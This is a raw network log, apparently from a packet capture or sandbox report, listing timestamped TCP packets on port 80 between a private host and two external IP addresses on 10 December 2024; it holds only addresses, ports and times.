Dec 10, 2024 00:42:30.811038017 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.811075926 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.811760902 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.811801910 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.811872959 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.811913013 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.812577009 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.812614918 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.812685966 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.812728882 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.813430071 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.813472033 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.813532114 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.813574076 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.814255953 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.814302921 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.814352989 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.814392090 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.815156937 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.815196991 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.931811094 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.931912899 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.931942940 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.931982040 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.932306051 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.932351112 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.932378054 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.932420015 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.932723045 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.932763100 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.932826042 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.932868004 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.933569908 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.933610916 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.933754921 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.933793068 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.934376001 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.934412956 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.934461117 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.934500933 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.935182095 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.935228109 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.935301065 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.935339928 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.936022043 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.936060905 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.936126947 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.936168909 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.936868906 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.936911106 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.936965942 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.937005043 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.937699080 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.937741041 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.937798023 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.937839985 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.938508987 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.938550949 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.938616037 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.938666105 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.939321041 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.939366102 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.939424992 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.939469099 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.940172911 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.940213919 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.940280914 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.940320969 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.940994978 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.941040039 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.941071987 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.941111088 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.941822052 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.941874027 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.941901922 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.941941977 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.942671061 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.942712069 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.942756891 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.942796946 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.943478107 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.943519115 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.943578005 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.943619013 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.944297075 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.944334030 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.944365978 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.944406986 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.054299116 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.054368019 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.054389954 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.054425955 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.054673910 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.054718971 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.054750919 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.054795980 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.055495977 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.055541992 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.055618048 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.055661917 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.056323051 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.056370020 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.056437016 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.056480885 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.057172060 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.057190895 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.057218075 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.057240963 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.057957888 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.058001995 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.058074951 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.058118105 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.058811903 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.058878899 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.058909893 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.058948040 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.059627056 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.059669018 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.059739113 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.059781075 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.060439110 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.060486078 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.504838943 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.504882097 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:31.624156952 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:31.624169111 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:32.428180933 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:32.428657055 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:32.506237984 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:32.625549078 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:32.943080902 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:32.943167925 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:32.943173885 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:32.943221092 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:32.943387032 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:32.943439007 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:32.945825100 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:33.065108061 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:33.382426977 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:33.382491112 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:33.394196033 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:33.514453888 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:34.313685894 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:34.313777924 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:34.339190006 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:34.460453033 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:34.778249025 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:34.778323889 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:34.782562017 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:34.904521942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:34.904614925 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:34.904828072 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:35.025603056 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.246623039 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.246676922 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.246750116 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.246934891 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.247164011 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.247210026 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.247258902 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.247267962 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.247317076 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.247450113 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.247492075 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.247533083 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.247541904 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.247577906 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.247910023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.247957945 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.247970104 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.248013020 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.367693901 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.367786884 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.367873907 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.367873907 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.371872902 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.371953011 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.373594046 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.373665094 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.373691082 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.373778105 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.439320087 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.439378023 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.439476967 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.439526081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.443511963 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.443573952 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.443599939 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.443624973 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.451999903 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.452049971 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.452096939 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.452138901 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.460464001 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.460530043 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.460592031 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.460637093 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.468920946 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.468970060 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.469012022 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.469047070 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.477391958 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.477456093 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.477480888 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.477515936 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.485835075 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.485887051 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.485922098 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.485961914 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.494332075 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.494384050 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.494483948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.494530916 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.502825022 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.502876997 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.502932072 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.503005981 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.510529995 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.510588884 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.510694981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.510741949 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.518174887 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.518239021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.609263897 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.609373093 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.609435081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.609435081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.613130093 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.613179922 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.631403923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.631418943 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.631555080 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.631555080 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.633557081 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.633625984 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.633635044 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.633675098 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.638087988 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.638139009 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.638175011 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.638222933 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.642370939 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.642427921 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.642466068 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.642509937 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.646924973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.646974087 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.647085905 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.647131920 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.651388884 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.651457071 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.651664019 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.651707888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.655888081 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.655935049 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.655971050 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.656013966 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.660330057 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.660382986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.660516024 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.660563946 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.664814949 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.664855957 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.664916992 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.664963007 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.669272900 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.669323921 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.669358969 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.669399023 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.673758984 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.673815966 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.673851967 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.673893929 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.678251982 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.678329945 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.678510904 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.678576946 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.682745934 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.682825089 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.682858944 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.682945967 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.687199116 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.687247992 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.687284946 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.687344074 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.687344074 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.691688061 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.691732883 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.691780090 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.691822052 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.696149111 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.696193933 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.696249962 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.696294069 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.700645924 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.700694084 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.700794935 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.700839996 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.705095053 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.705151081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.705233097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.705281973 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.709574938 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.709623098 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.709686041 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.709732056 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.714072943 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.714119911 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.714164972 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.714207888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.718525887 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.718574047 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.801292896 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.801377058 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.801414013 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.801455975 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.803359985 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.803417921 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.803438902 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.803507090 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.807578087 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.807646036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.823257923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.823406935 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.823416948 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.823443890 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.824928045 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.824976921 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.825556040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.825651884 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.825686932 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.825731039 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.829063892 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.829116106 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.829190969 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.829240084 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.832505941 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.832555056 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:36.832602024 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:36.832645893 CET	49759	80	192.168.2.4	185.215.113.16
